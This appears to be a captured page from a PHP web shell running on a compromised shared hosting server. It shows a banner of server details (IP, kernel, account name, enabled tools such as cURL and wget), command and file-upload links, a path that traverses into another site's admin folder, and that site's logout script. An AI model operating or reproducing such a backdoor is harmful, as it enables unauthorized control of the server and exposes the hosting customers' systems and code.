|
Server IP : 10.111.40.2 / Your IP : 216.73.216.60 Web Server : Apache System : Linux webd002.cluster111.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : comimage ( 973271) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/comimage/atia2m.fr/../../comimage/arti/../louisdanielcoiffure.com/ancien/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
// *** Logout the current user.
$logoutGoTo = "index.php";
if (!isset($_SESSION)) {
session_start();
}
$_SESSION['MM_Username'] = NULL;
$_SESSION['MM_UserGroup'] = NULL;
unset($_SESSION['MM_Username']);
unset($_SESSION['MM_UserGroup']);
if ($logoutGoTo != "") {
if(isset($_GET['status']) && strlen($_GET['status']) > 0){
$logoutGoTo = $logoutGoTo . '?status=' . $_GET['status'];
}
header("Location: $logoutGoTo");
exit;
}
?>